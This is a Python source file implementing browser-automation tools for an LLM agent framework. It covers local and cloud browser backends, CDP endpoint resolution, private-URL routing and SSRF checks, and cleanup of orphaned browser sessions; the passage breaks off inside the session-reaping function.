browser_tool.py
1 #!/usr/bin/env python3 2 """ 3 Browser Tool Module 4 5 This module provides browser automation tools using agent-browser CLI. It 6 supports multiple backends — **Browser Use** (cloud, default for Nous 7 subscribers), **Browserbase** (cloud, direct credentials), and **local 8 Chromium** — with identical agent-facing behaviour. The backend is 9 auto-detected from config and available credentials. 10 11 The tool uses agent-browser's accessibility tree (ariaSnapshot) for text-based 12 page representation, making it ideal for LLM agents without vision capabilities. 13 14 Features: 15 - **Local mode** (default): zero-cost headless Chromium via agent-browser. 16 Works on Linux servers without a display. One-time setup: 17 ``agent-browser install`` (downloads Chromium) or 18 ``agent-browser install --with-deps`` (also installs system libraries for 19 Debian/Ubuntu/Docker). 20 - **Cloud mode**: Browserbase or Browser Use cloud execution when configured. 21 - Session isolation per task ID 22 - Text-based page snapshots using accessibility tree 23 - Element interaction via ref selectors (@e1, @e2, etc.) 24 - Task-aware content extraction using LLM summarization 25 - Automatic cleanup of browser sessions 26 27 Environment Variables: 28 - BROWSERBASE_API_KEY: API key for direct Browserbase cloud mode 29 - BROWSERBASE_PROJECT_ID: Project ID for direct Browserbase cloud mode 30 - BROWSER_USE_API_KEY: API key for direct Browser Use cloud mode 31 - BROWSERBASE_PROXIES: Enable/disable residential proxies (default: "true") 32 - BROWSERBASE_ADVANCED_STEALTH: Enable advanced stealth mode with custom Chromium, 33 requires Scale Plan (default: "false") 34 - BROWSERBASE_KEEP_ALIVE: Enable keepAlive for session reconnection after disconnects, 35 requires paid plan (default: "true") 36 - BROWSERBASE_SESSION_TIMEOUT: Custom session timeout in milliseconds. Set to extend 37 beyond project default. 
Common values: 600000 (10min), 1800000 (30min) (default: none) 38 39 Usage: 40 from tools.browser_tool import browser_navigate, browser_snapshot, browser_click 41 42 # Navigate to a page 43 result = browser_navigate("https://example.com", task_id="task_123") 44 45 # Get page snapshot 46 snapshot = browser_snapshot(task_id="task_123") 47 48 # Click an element 49 browser_click("@e5", task_id="task_123") 50 """ 51 52 import atexit 53 import functools 54 import json 55 import logging 56 import os 57 import re 58 import signal 59 import subprocess 60 import shutil 61 import sys 62 import tempfile 63 import threading 64 import time 65 import requests 66 from typing import Dict, Any, Optional, List, Tuple 67 from pathlib import Path 68 from agent.auxiliary_client import call_llm 69 from hermes_constants import get_hermes_home 70 from utils import is_truthy_value 71 from hermes_cli.config import cfg_get 72 73 try: 74 from tools.website_policy import check_website_access 75 except Exception: 76 check_website_access = lambda url: None # noqa: E731 — fail-open if policy module unavailable 77 78 try: 79 from tools.url_safety import is_safe_url as _is_safe_url 80 except Exception: 81 _is_safe_url = lambda url: False # noqa: E731 — fail-closed: block all if safety module unavailable 82 from tools.browser_providers.base import CloudBrowserProvider 83 from tools.browser_providers.browserbase import BrowserbaseProvider 84 from tools.browser_providers.browser_use import BrowserUseProvider 85 from tools.browser_providers.firecrawl import FirecrawlProvider 86 from tools.tool_backend_helpers import normalize_browser_cloud_provider 87 88 # Camofox local anti-detection browser backend (optional). 89 # When CAMOFOX_URL is set, all browser operations route through the 90 # camofox REST API instead of the agent-browser CLI. 
91 try: 92 from tools.browser_camofox import is_camofox_mode as _is_camofox_mode 93 except ImportError: 94 _is_camofox_mode = lambda: False # noqa: E731 95 96 logger = logging.getLogger(__name__) 97 98 # Standard PATH entries for environments with minimal PATH (e.g. systemd services). 99 # Includes Android/Termux and macOS Homebrew locations needed for agent-browser, 100 # npx, node, and Android's glibc runner (grun). 101 _SANE_PATH_DIRS = ( 102 "/data/data/com.termux/files/usr/bin", 103 "/data/data/com.termux/files/usr/sbin", 104 "/opt/homebrew/bin", 105 "/opt/homebrew/sbin", 106 "/usr/local/sbin", 107 "/usr/local/bin", 108 "/usr/sbin", 109 "/usr/bin", 110 "/sbin", 111 "/bin", 112 ) 113 _SANE_PATH = os.pathsep.join(_SANE_PATH_DIRS) 114 115 116 @functools.lru_cache(maxsize=1) 117 def _discover_homebrew_node_dirs() -> tuple[str, ...]: 118 """Find Homebrew versioned Node.js bin directories (e.g. node@20, node@24). 119 120 When Node is installed via ``brew install node@24`` and NOT linked into 121 /opt/homebrew/bin, agent-browser isn't discoverable on the default PATH. 122 This function finds those directories so they can be prepended. 
123 """ 124 dirs: list[str] = [] 125 homebrew_opt = "/opt/homebrew/opt" 126 if not os.path.isdir(homebrew_opt): 127 return tuple(dirs) 128 try: 129 for entry in os.listdir(homebrew_opt): 130 if entry.startswith("node") and entry != "node": 131 bin_dir = os.path.join(homebrew_opt, entry, "bin") 132 if os.path.isdir(bin_dir): 133 dirs.append(bin_dir) 134 except OSError: 135 pass 136 return tuple(dirs) 137 138 139 def _browser_candidate_path_dirs() -> list[str]: 140 """Return ordered browser CLI PATH candidates shared by discovery and execution.""" 141 hermes_home = get_hermes_home() 142 hermes_node_bin = str(hermes_home / "node" / "bin") 143 return [hermes_node_bin, *list(_discover_homebrew_node_dirs()), *_SANE_PATH_DIRS] 144 145 146 def _merge_browser_path(existing_path: str = "") -> str: 147 """Prepend browser-specific PATH fallbacks without reordering existing entries.""" 148 path_parts = [p for p in (existing_path or "").split(os.pathsep) if p] 149 existing_parts = set(path_parts) 150 prefix_parts: list[str] = [] 151 152 for part in _browser_candidate_path_dirs(): 153 if not part or part in existing_parts or part in prefix_parts: 154 continue 155 if os.path.isdir(part): 156 prefix_parts.append(part) 157 158 return os.pathsep.join(prefix_parts + path_parts) 159 160 # Throttle screenshot cleanup to avoid repeated full directory scans. 161 _last_screenshot_cleanup_by_dir: dict[str, float] = {} 162 163 # ============================================================================ 164 # Configuration 165 # ============================================================================ 166 167 # Default timeout for browser commands (seconds) 168 DEFAULT_COMMAND_TIMEOUT = 30 169 170 # Max tokens for snapshot content before summarization 171 SNAPSHOT_SUMMARIZE_THRESHOLD = 8000 172 173 # Commands that legitimately return empty stdout (e.g. close, record). 
# Commands whose empty stdout is a success, not a failure (see _EMPTY_OK_COMMANDS use).
_EMPTY_OK_COMMANDS: frozenset = frozenset({"close", "record"})

# Process-lifetime cache for _get_command_timeout(); reset by cleanup_all_browsers().
_cached_command_timeout: Optional[int] = None
_command_timeout_resolved = False


def _get_command_timeout() -> int:
    """Return the configured browser command timeout from config.yaml.

    Reads ``config["browser"]["command_timeout"]`` and falls back to
    ``DEFAULT_COMMAND_TIMEOUT`` (30s) if unset or unreadable. Result is
    cached after the first call and cleared by ``cleanup_all_browsers()``.
    """
    global _cached_command_timeout, _command_timeout_resolved
    if _command_timeout_resolved:
        return _cached_command_timeout  # type: ignore[return-value]

    _command_timeout_resolved = True
    result = DEFAULT_COMMAND_TIMEOUT
    try:
        from hermes_cli.config import read_raw_config
        cfg = read_raw_config()
        val = cfg_get(cfg, "browser", "command_timeout")
        if val is not None:
            result = max(int(val), 5)  # Floor at 5s to avoid instant kills
    except Exception as e:
        logger.debug("Could not read command_timeout from config: %s", e)
    _cached_command_timeout = result
    return result


def _get_vision_model() -> Optional[str]:
    """Model for browser_vision (screenshot analysis — multimodal)."""
    return os.getenv("AUXILIARY_VISION_MODEL", "").strip() or None


def _get_extraction_model() -> Optional[str]:
    """Model for page snapshot text summarization — same as web_extract."""
    return os.getenv("AUXILIARY_WEB_EXTRACT_MODEL", "").strip() or None


def _resolve_cdp_override(cdp_url: str) -> str:
    """Normalize a user-supplied CDP endpoint into a concrete connectable URL.

    Accepts:
    - full websocket endpoints: ws://host:port/devtools/browser/...
    - HTTP discovery endpoints: http://host:port or http://host:port/json/version
    - bare websocket host:port values like ws://host:port

    For discovery-style endpoints we fetch /json/version and return the
    webSocketDebuggerUrl so downstream tools always receive a concrete browser
    websocket instead of an ambiguous host:port URL. On any failure the raw
    input is returned unchanged (best-effort normalization).
    """
    raw = (cdp_url or "").strip()
    if not raw:
        return ""

    lowered = raw.lower()
    # Already a concrete browser websocket — nothing to resolve.
    if "/devtools/browser/" in lowered:
        return raw

    discovery_url = raw
    if lowered.startswith(("ws://", "wss://")):
        # Bare ws://host:port (exactly one colon after the scheme's, numeric
        # port, no path) → probe the equivalent http(s) discovery endpoint.
        if raw.count(":") == 2 and raw.rstrip("/").rsplit(":", 1)[-1].isdigit() and "/" not in raw.split(":", 2)[-1]:
            discovery_url = ("http://" if lowered.startswith("ws://") else "https://") + raw.split("://", 1)[1]
        else:
            return raw

    if discovery_url.lower().endswith("/json/version"):
        version_url = discovery_url
    else:
        version_url = discovery_url.rstrip("/") + "/json/version"

    try:
        response = requests.get(version_url, timeout=10)
        response.raise_for_status()
        payload = response.json()
    except Exception as exc:
        logger.warning("Failed to resolve CDP endpoint %s via %s: %s", raw, version_url, exc)
        return raw

    ws_url = str(payload.get("webSocketDebuggerUrl") or "").strip()
    if ws_url:
        logger.info("Resolved CDP endpoint %s -> %s", raw, ws_url)
        return ws_url

    logger.warning("CDP discovery at %s did not return webSocketDebuggerUrl; using raw endpoint", version_url)
    return raw


def _get_cdp_override() -> str:
    """Return a normalized CDP URL override, or empty string.

    Precedence is:
    1. ``BROWSER_CDP_URL`` env var (live override from ``/browser connect``)
    2. ``browser.cdp_url`` in config.yaml (persistent config)

    When either is set, we skip both Browserbase and the local headless
    launcher and connect directly to the supplied Chrome DevTools Protocol
    endpoint.
    """
    env_override = os.environ.get("BROWSER_CDP_URL", "").strip()
    if env_override:
        return _resolve_cdp_override(env_override)

    try:
        from hermes_cli.config import read_raw_config

        cfg = read_raw_config()
        browser_cfg = cfg.get("browser", {})
        if isinstance(browser_cfg, dict):
            return _resolve_cdp_override(str(browser_cfg.get("cdp_url", "") or ""))
    except Exception as e:
        logger.debug("Could not read browser.cdp_url from config: %s", e)

    return ""


def _get_dialog_policy_config() -> Tuple[str, float]:
    """Read ``browser.dialog_policy`` + ``browser.dialog_timeout_s`` from config.

    Returns a ``(policy, timeout_s)`` tuple, falling back to the supervisor's
    defaults when keys are absent or invalid.
    """
    # Defer imports so browser_tool can be imported in minimal environments.
    from tools.browser_supervisor import (
        DEFAULT_DIALOG_POLICY,
        DEFAULT_DIALOG_TIMEOUT_S,
        _VALID_POLICIES,
    )

    try:
        from hermes_cli.config import read_raw_config

        cfg = read_raw_config()
        browser_cfg = cfg.get("browser", {}) if isinstance(cfg, dict) else {}
        if not isinstance(browser_cfg, dict):
            return DEFAULT_DIALOG_POLICY, DEFAULT_DIALOG_TIMEOUT_S
        policy = str(browser_cfg.get("dialog_policy") or DEFAULT_DIALOG_POLICY)
        if policy not in _VALID_POLICIES:
            logger.debug("Invalid browser.dialog_policy=%r; using default", policy)
            policy = DEFAULT_DIALOG_POLICY
        timeout_raw = browser_cfg.get("dialog_timeout_s")
        try:
            # Non-positive or non-numeric timeouts fall back to the default.
            timeout_s = float(timeout_raw) if timeout_raw is not None else DEFAULT_DIALOG_TIMEOUT_S
            if timeout_s <= 0:
                timeout_s = DEFAULT_DIALOG_TIMEOUT_S
        except (TypeError, ValueError):
            timeout_s = DEFAULT_DIALOG_TIMEOUT_S
        return policy, timeout_s
    except Exception:
        return DEFAULT_DIALOG_POLICY, DEFAULT_DIALOG_TIMEOUT_S


def _ensure_cdp_supervisor(task_id: str) -> None:
    """Start a CDP supervisor for ``task_id`` if an endpoint is reachable.

    Idempotent — delegates to ``SupervisorRegistry.get_or_start`` which skips
    when a supervisor for this ``(task_id, cdp_url)`` already exists and
    tears down + restarts on URL change. Safe to call on every
    ``browser_navigate`` / ``/browser connect`` without worrying about
    double-attach.

    Resolves the CDP URL in this order:
    1. ``BROWSER_CDP_URL`` / ``browser.cdp_url`` — covers ``/browser connect``
       and config-set overrides.
    2. ``_active_sessions[task_id]["cdp_url"]`` — covers Browserbase + any
       other cloud provider whose ``create_session`` returns a raw CDP URL.

    Swallows all errors — failing to attach the supervisor must not break
    the browser session itself. The agent simply won't see
    ``pending_dialogs`` / ``frame_tree`` fields in snapshots.
    """
    cdp_url = _get_cdp_override()
    if not cdp_url:
        # Fallback: active session may carry a per-session CDP URL from a
        # cloud provider (Browserbase sets this). Read it under the lock,
        # but resolve (which may do an HTTP round-trip) outside it.
        with _cleanup_lock:
            session_info = _active_sessions.get(task_id, {})
            maybe = str(session_info.get("cdp_url") or "")
        if maybe:
            cdp_url = _resolve_cdp_override(maybe)
    if not cdp_url:
        return
    try:
        from tools.browser_supervisor import SUPERVISOR_REGISTRY  # type: ignore[import-not-found]

        policy, timeout_s = _get_dialog_policy_config()
        SUPERVISOR_REGISTRY.get_or_start(
            task_id=task_id,
            cdp_url=cdp_url,
            dialog_policy=policy,
            dialog_timeout_s=timeout_s,
        )
    except Exception as exc:
        logger.debug(
            "CDP supervisor attach for task=%s failed (non-fatal): %s",
            task_id,
            exc,
        )


def _stop_cdp_supervisor(task_id: str) -> None:
    """Stop the CDP supervisor for ``task_id`` if one exists. No-op otherwise."""
    try:
        from tools.browser_supervisor import SUPERVISOR_REGISTRY  # type: ignore[import-not-found]

        SUPERVISOR_REGISTRY.stop(task_id)
    except Exception as exc:
        logger.debug("CDP supervisor stop for task=%s failed (non-fatal): %s", task_id, exc)


# ============================================================================
# Cloud Provider Registry
# ============================================================================

# Maps config "cloud_provider" keys to provider classes (instantiated lazily).
_PROVIDER_REGISTRY: Dict[str, type] = {
    "browserbase": BrowserbaseProvider,
    "browser-use": BrowserUseProvider,
    "firecrawl": FirecrawlProvider,
}

# Process-lifetime caches; "resolved" flags distinguish "not yet read" from
# "read, and the answer was None/False".
_cached_cloud_provider: Optional[CloudBrowserProvider] = None
_cloud_provider_resolved = False
_allow_private_urls_resolved = False
_cached_allow_private_urls: Optional[bool] = None
_cached_agent_browser: Optional[str] = None
_agent_browser_resolved = False


def _get_cloud_provider() -> Optional[CloudBrowserProvider]:
    """Return the configured cloud browser provider, or None for local mode.

    Reads ``config["browser"]["cloud_provider"]`` once and caches the result
    for the process lifetime. An explicit ``local`` provider disables cloud
    fallback. If unset, prefer Browser Use when it is configured, then fall
    back to Browserbase when direct credentials are available.
    """
    global _cached_cloud_provider, _cloud_provider_resolved
    if _cloud_provider_resolved:
        return _cached_cloud_provider

    _cloud_provider_resolved = True
    try:
        from hermes_cli.config import read_raw_config
        cfg = read_raw_config()
        browser_cfg = cfg.get("browser", {})
        provider_key = None
        if isinstance(browser_cfg, dict) and "cloud_provider" in browser_cfg:
            provider_key = normalize_browser_cloud_provider(
                browser_cfg.get("cloud_provider")
            )
        if provider_key == "local":
            # Explicit local: no cloud fallback at all.
            _cached_cloud_provider = None
            return None
        if provider_key and provider_key in _PROVIDER_REGISTRY:
            _cached_cloud_provider = _PROVIDER_REGISTRY[provider_key]()
    except Exception as e:
        logger.debug("Could not read cloud_provider from config: %s", e)

    if _cached_cloud_provider is None:
        # Prefer Browser Use (managed Nous gateway or direct API key),
        # fall back to Browserbase (direct credentials only).
        fallback_provider = BrowserUseProvider()
        if fallback_provider.is_configured():
            _cached_cloud_provider = fallback_provider
        else:
            fallback_provider = BrowserbaseProvider()
            if fallback_provider.is_configured():
                _cached_cloud_provider = fallback_provider

    return _cached_cloud_provider


from hermes_constants import is_termux as _is_termux_environment


def _browser_install_hint() -> str:
    """Return the platform-appropriate agent-browser install command."""
    if _is_termux_environment():
        return "npm install -g agent-browser && agent-browser install"
    return "npm install -g agent-browser && agent-browser install --with-deps"


def _requires_real_termux_browser_install(browser_cmd: str) -> bool:
    """True when local Termux mode would run the bare ``npx agent-browser`` fallback."""
    return _is_termux_environment() and _is_local_mode() and browser_cmd.strip() == "npx agent-browser"


def _termux_browser_install_error() -> str:
    """Error message telling Termux users to install agent-browser explicitly."""
    return (
        "Local browser automation on Termux cannot rely on the bare npx fallback. "
        f"Install agent-browser explicitly first: {_browser_install_hint()}"
    )


def _is_local_mode() -> bool:
    """Return True when the browser tool will use a local browser backend."""
    if _get_cdp_override():
        return False
    return _get_cloud_provider() is None


def _is_local_backend() -> bool:
    """Return True when the browser runs locally (no cloud provider).

    SSRF protection is only meaningful for cloud backends (Browserbase,
    BrowserUse) where the agent could reach internal resources on a remote
    machine. For local backends — Camofox, or the built-in headless
    Chromium without a cloud provider — the user already has full terminal
    and network access on the same machine, so the check adds no security
    value.
    """
    return _is_camofox_mode() or _get_cloud_provider() is None


# Cache for _auto_local_for_private_urls(); default is enabled.
_auto_local_for_private_urls_resolved = False
_cached_auto_local_for_private_urls: bool = True


def _auto_local_for_private_urls() -> bool:
    """Return whether a cloud-configured install should auto-spawn a local
    Chromium for LAN/localhost URLs.

    Reads ``browser.auto_local_for_private_urls`` once (default ``True``) and
    caches it for the process lifetime. When enabled, ``browser_navigate``
    routes URLs whose host resolves to a private/loopback/LAN address to a
    local headless Chromium sidecar even when a cloud provider (Browserbase
    / Browser-Use / Firecrawl) is configured globally. Public URLs continue
    to use the cloud provider in the same conversation.
    """
    global _auto_local_for_private_urls_resolved, _cached_auto_local_for_private_urls
    if _auto_local_for_private_urls_resolved:
        return _cached_auto_local_for_private_urls

    _auto_local_for_private_urls_resolved = True
    try:
        from hermes_cli.config import read_raw_config
        cfg = read_raw_config()
        browser_cfg = cfg.get("browser", {})
        if isinstance(browser_cfg, dict) and "auto_local_for_private_urls" in browser_cfg:
            _cached_auto_local_for_private_urls = bool(
                browser_cfg.get("auto_local_for_private_urls")
            )
    except Exception as e:
        logger.debug("Could not read auto_local_for_private_urls from config: %s", e)
    return _cached_auto_local_for_private_urls


def _url_is_private(url: str) -> bool:
    """Return True when the URL's host resolves to a private/LAN/loopback address.

    Mirrors the private-network classification of ``tools.url_safety.is_safe_url``
    (private, loopback, link-local, CGNAT 100.64.0.0/10) but is implemented
    inline so DNS failures can be distinguished: ``is_safe_url`` returns False
    for both private hosts AND unresolvable hosts, whereas here DNS resolution
    failures are treated as NOT private (fall through to whatever backend is
    configured, which will surface the DNS error naturally).
    """
    try:
        # is_safe_url returns False for private/loopback/link-local/CGNAT AND
        # for DNS failures. We only want the private-network case here, so
        # we parse + check the host shape as a DNS-failure sieve first.
        from urllib.parse import urlparse
        import ipaddress
        import socket
        parsed = urlparse(url)
        hostname = (parsed.hostname or "").strip().lower().rstrip(".")
        if not hostname:
            return False
        # Literal IP → check directly
        try:
            ip = ipaddress.ip_address(hostname)
            return (
                ip.is_private
                or ip.is_loopback
                or ip.is_link_local
                or ip in ipaddress.ip_network("100.64.0.0/10")
            )
        except ValueError:
            pass
        # Hostname — must resolve to confirm it's private (bare "localhost"
        # resolves to 127.0.0.1 via /etc/hosts). Short-circuit on obvious
        # names to avoid a DNS hop.
        if hostname in ("localhost",) or hostname.endswith(".localhost"):
            return True
        if hostname.endswith(".local") or hostname.endswith(".lan") or hostname.endswith(".internal"):
            return True
        try:
            addr_info = socket.getaddrinfo(hostname, None, socket.AF_UNSPEC, socket.SOCK_STREAM)
        except socket.gaierror:
            return False  # DNS fail → not private, let the normal path fail
        for _, _, _, _, sockaddr in addr_info:
            try:
                ip = ipaddress.ip_address(sockaddr[0])
            except ValueError:
                continue
            if (
                ip.is_private
                or ip.is_loopback
                or ip.is_link_local
                or ip in ipaddress.ip_network("100.64.0.0/10")
            ):
                return True
        return False
    except Exception as exc:
        logger.debug("URL-privacy check failed for %s: %s", url, exc)
        return False


def _navigation_session_key(task_id: str, url: str) -> str:
    """Pick the session key that should handle ``url`` for ``task_id``.

    Returns the bare task_id unless ALL of these are true:
    1. A cloud provider is configured (``_get_cloud_provider()`` is not None).
    2. Auto-local routing is enabled (``browser.auto_local_for_private_urls``,
       default True).
    3. The URL resolves to a private/LAN/loopback address.
    4. A CDP override is not active (that path owns the whole session).
    5. Camofox mode is not active (Camofox is already local-only).

    When all are true, returns ``f"{task_id}::local"`` so the hybrid-routing
    path spawns a local Chromium sidecar while the cloud session (if any)
    continues to serve public URLs.
    """
    if task_id is None:
        task_id = "default"
    if _get_cdp_override():
        return task_id
    if _is_camofox_mode():
        return task_id
    if _get_cloud_provider() is None:
        return task_id
    if not _auto_local_for_private_urls():
        return task_id
    if not _url_is_private(url):
        return task_id
    return f"{task_id}{_LOCAL_SUFFIX}"


def _is_local_sidecar_key(session_key: str) -> bool:
    """Return True when ``session_key`` is a hybrid-routing local sidecar."""
    return session_key.endswith(_LOCAL_SUFFIX)


def _last_session_key(task_id: str) -> str:
    """Return the session key to use for a non-nav browser tool call.

    If a previous ``browser_navigate`` on this task_id set a last-active key,
    use it so snapshot/click/fill/etc. hit the same session. Otherwise fall
    back to the bare task_id (matches original behavior for tasks that never
    triggered hybrid routing).
    """
    if task_id is None:
        task_id = "default"
    return _last_active_session_key.get(task_id, task_id)


def _allow_private_urls() -> bool:
    """Return whether the browser is allowed to navigate to private/internal addresses.

    Reads ``config["browser"]["allow_private_urls"]`` once and caches the result
    for the process lifetime. Defaults to ``False`` (SSRF protection active).
    """
    global _cached_allow_private_urls, _allow_private_urls_resolved
    if _allow_private_urls_resolved:
        return _cached_allow_private_urls

    _allow_private_urls_resolved = True
    _cached_allow_private_urls = False  # safe default
    try:
        from hermes_cli.config import read_raw_config
        cfg = read_raw_config()
        browser_cfg = cfg.get("browser", {})
        if isinstance(browser_cfg, dict):
            _cached_allow_private_urls = is_truthy_value(
                browser_cfg.get("allow_private_urls"), default=False
            )
    except Exception as e:
        logger.debug("Could not read allow_private_urls from config: %s", e)
    return _cached_allow_private_urls


def _socket_safe_tmpdir() -> str:
    """Return a short temp directory path suitable for Unix domain sockets.

    macOS sets ``TMPDIR`` to ``/var/folders/xx/.../T/`` (~51 chars). When we
    append ``agent-browser-hermes_…`` the resulting socket path exceeds the
    104-byte macOS limit for ``AF_UNIX`` addresses, causing agent-browser to
    fail with "Failed to create socket directory" or silent screenshot failures.

    Linux ``tempfile.gettempdir()`` already returns ``/tmp``, so this is a
    no-op there. On macOS we bypass ``TMPDIR`` and use ``/tmp`` directly
    (symlink to ``/private/tmp``, sticky-bit protected, always available).
    """
    if sys.platform == "darwin":
        return "/tmp"
    return tempfile.gettempdir()


# Track active sessions per "session key".
#
# A "session key" is either the bare task_id (cloud/default path) OR a composite
# like f"{task_id}::local" when the hybrid-routing feature spawns a local sidecar
# browser for a LAN/localhost URL while a cloud provider is configured globally.
# Both forms flow through the same _active_sessions / _run_browser_command /
# cleanup_browser code paths — the key is opaque to those internals.
#
# Stores: session_name (always), bb_session_id + cdp_url (cloud mode only)
_active_sessions: Dict[str, Dict[str, str]] = {}  # session_key -> {session_name, ...}
_recording_sessions: set = set()  # session_keys with active recordings

# Tracks the most recent session_key used per task_id. Set by browser_navigate()
# after it chooses a backend for a URL; read by every non-nav browser tool
# (snapshot/click/fill/eval/...) so they target the session that served the last
# navigation. Without this, a task that navigated to localhost on the local
# sidecar would fall back to the cloud session on its next snapshot call.
_last_active_session_key: Dict[str, str] = {}  # task_id -> session_key
_LOCAL_SUFFIX = "::local"  # appended to task_id for hybrid-routing sidecar keys

# Flag to track if cleanup has been done
_cleanup_done = False

# =============================================================================
# Inactivity Timeout Configuration
# =============================================================================

# Session inactivity timeout (seconds) - cleanup if no activity for this long
# Default: 5 minutes. Needs headroom for LLM reasoning between browser commands,
# especially when subagents are doing multi-step browser tasks.
BROWSER_SESSION_INACTIVITY_TIMEOUT = int(os.environ.get("BROWSER_INACTIVITY_TIMEOUT", "300"))

# Track last activity time per session (time.time() floats, keyed by session key)
_session_last_activity: Dict[str, float] = {}

# Background cleanup thread state
_cleanup_thread = None
_cleanup_running = False
# Protects _session_last_activity AND _active_sessions for thread safety
# (subagents run concurrently via ThreadPoolExecutor)
_cleanup_lock = threading.Lock()


def _emergency_cleanup_all_sessions():
    """
    Emergency cleanup of all active browser sessions.
    Called on process exit or interrupt to prevent orphaned sessions.

    Also runs the orphan reaper to clean up daemons left behind by previously
    crashed hermes processes — this way every clean hermes exit sweeps
    accumulated orphans, not just ones that actively used the browser tool.

    Idempotent: the ``_cleanup_done`` flag guarantees a single run even if
    registered multiple times or invoked directly.
    """
    global _cleanup_done
    if _cleanup_done:
        return
    _cleanup_done = True

    # Clean up this process's own sessions first, so their owner_pid files
    # are removed before the reaper scans.
    if _active_sessions:
        logger.info("Emergency cleanup: closing %s active session(s)...",
                    len(_active_sessions))
        try:
            cleanup_all_browsers()
        except Exception as e:
            logger.error("Emergency cleanup error: %s", e)
        finally:
            # Always drop in-memory tracking, even if closing sessions failed,
            # so the reaper below sees a consistent view.
            with _cleanup_lock:
                _active_sessions.clear()
                _session_last_activity.clear()
                _recording_sessions.clear()

    # Sweep orphans from other crashed hermes processes. Safe even if we
    # never used the browser — uses owner_pid liveness to avoid reaping
    # daemons owned by other live hermes processes.
    try:
        _reap_orphaned_browser_sessions()
    except Exception as e:
        logger.debug("Orphan reap on exit failed: %s", e)


# Register cleanup via atexit only. Previous versions installed SIGINT/SIGTERM
# handlers that called sys.exit(), but this conflicts with prompt_toolkit's
# async event loop — a SystemExit raised inside a key-binding callback
# corrupts the coroutine state and makes the process unkillable. atexit
# handlers run on any normal exit (including sys.exit), so browser sessions
# are still cleaned up without hijacking signals.
atexit.register(_emergency_cleanup_all_sessions)


# =============================================================================
# Inactivity Cleanup Functions
# =============================================================================

def _cleanup_inactive_browser_sessions():
    """
    Clean up browser sessions that have been inactive for longer than the timeout.

    This function is called periodically by the background cleanup thread to
    automatically close sessions that haven't been used recently, preventing
    orphaned sessions (local or Browserbase) from accumulating.
    """
    current_time = time.time()
    sessions_to_cleanup = []

    # Snapshot the stale keys under the lock; do the (slow) cleanup outside it.
    with _cleanup_lock:
        for task_id, last_time in list(_session_last_activity.items()):
            if current_time - last_time > BROWSER_SESSION_INACTIVITY_TIMEOUT:
                sessions_to_cleanup.append(task_id)

    # NOTE(review): keys here are session keys (may carry the "::local"
    # suffix), though the variable is named task_id — confirm cleanup_browser
    # accepts both forms.
    for task_id in sessions_to_cleanup:
        try:
            elapsed = int(current_time - _session_last_activity.get(task_id, current_time))
            logger.info("Cleaning up inactive session for task: %s (inactive for %ss)", task_id, elapsed)
            cleanup_browser(task_id)
            with _cleanup_lock:
                if task_id in _session_last_activity:
                    del _session_last_activity[task_id]
        except Exception as e:
            logger.warning("Error cleaning up inactive session %s: %s", task_id, e)


def _write_owner_pid(socket_dir: str, session_name: str) -> None:
    """Record the current hermes PID as the owner of a browser socket dir.

    Written to ``<socket_dir>/<session_name>.owner_pid`` so the
    orphan reaper can distinguish daemons owned by a live hermes process
    (don't reap) from daemons whose owner crashed (reap). Best-effort —
    an OSError here just falls back to the legacy ``tracked_names``
    heuristic in the reaper.
    """
    try:
        path = os.path.join(socket_dir, f"{session_name}.owner_pid")
        with open(path, "w") as f:
            f.write(str(os.getpid()))
    except OSError as exc:
        logger.debug("Could not write owner_pid file for %s: %s",
                     session_name, exc)


def _reap_orphaned_browser_sessions():
    """Scan for orphaned agent-browser daemon processes from previous runs.

    When the Python process that created a browser session exits uncleanly
    (SIGKILL, crash, gateway restart), the in-memory ``_active_sessions``
    tracking is lost but the node + Chromium processes keep running.

    This function scans the tmp directory for ``agent-browser-*`` socket dirs
    left behind by previous runs, reads the daemon PID files, and kills any
    daemons whose owning hermes process is no longer alive.

    Ownership detection priority:
    1. ``<session>.owner_pid`` file (written by current code) — if the
       referenced hermes PID is alive, leave the daemon alone regardless
       of whether it's in *this* process's ``_active_sessions``. This is
       cross-process safe: two concurrent hermes instances won't reap each
       other's daemons.
    2. Fallback for daemons that predate owner_pid: check
       ``_active_sessions`` in the current process. If not tracked here,
       treat as orphan (legacy behavior).

    Safe to call from any context — atexit, cleanup thread, or on demand.
    """
    import glob

    tmpdir = _socket_safe_tmpdir()
    pattern = os.path.join(tmpdir, "agent-browser-h_*")
    socket_dirs = glob.glob(pattern)
    # Also pick up CDP sessions
    socket_dirs += glob.glob(os.path.join(tmpdir, "agent-browser-cdp_*"))
    # Also pick up cloud-provider sessions (browser-use/browserbase/firecrawl)
    socket_dirs += glob.glob(os.path.join(tmpdir, "agent-browser-hermes_*"))

    if not socket_dirs:
        return

    # Build set of session_names currently tracked by this process (fallback path)
    with _cleanup_lock:
        tracked_names = {
            info.get("session_name")
            for info in _active_sessions.values()
            if info.get("session_name")
        }

    reaped = 0
    for socket_dir in socket_dirs:
        dir_name = os.path.basename(socket_dir)
        # dir_name is "agent-browser-{session_name}"
        session_name = dir_name.removeprefix("agent-browser-")
        if not session_name:
            continue

        # Ownership check: prefer owner_pid file (cross-process safe).
        owner_pid_file = os.path.join(socket_dir, f"{session_name}.owner_pid")
        owner_alive: Optional[bool] = None  # None = owner_pid missing/unreadable
        if os.path.isfile(owner_pid_file):
            try:
                owner_pid = int(Path(owner_pid_file).read_text().strip())
                try:
                    # Signal 0: existence/liveness probe, sends nothing.
                    os.kill(owner_pid, 0)
                    owner_alive = True
                except ProcessLookupError:
                    owner_alive = False
                except PermissionError:
                    # Owner exists but we can't signal it (different uid).
                    # Treat as alive — don't reap someone else's session.
                    owner_alive = True
            except (ValueError, OSError):
                owner_alive = None  # corrupt file — fall through

        if owner_alive is True:
            # Owner is alive — this session belongs to a live hermes process.
            continue

        if owner_alive is None:
            # No owner_pid file (legacy daemon). Fall back to in-process
            # tracking: if this process knows about the session, leave alone.
            if session_name in tracked_names:
                continue

        # owner_alive is False (dead owner) OR legacy daemon not tracked here.
        pid_file = os.path.join(socket_dir, f"{session_name}.pid")
        if not os.path.isfile(pid_file):
            # No daemon PID file — just a stale dir, remove it
            shutil.rmtree(socket_dir, ignore_errors=True)
            continue

        try:
            daemon_pid = int(Path(pid_file).read_text().strip())
        except (ValueError, OSError):
            shutil.rmtree(socket_dir, ignore_errors=True)
            continue

        # Check if the daemon is still alive
        try:
            os.kill(daemon_pid, 0)  # signal 0 = existence check
        except ProcessLookupError:
            # Already dead, just clean up the dir
            shutil.rmtree(socket_dir, ignore_errors=True)
            continue
        except PermissionError:
            # Alive but owned by someone else — leave it alone
            continue

        # Daemon is alive and its owner is dead (or legacy + untracked). Reap.
        try:
            os.kill(daemon_pid, signal.SIGTERM)
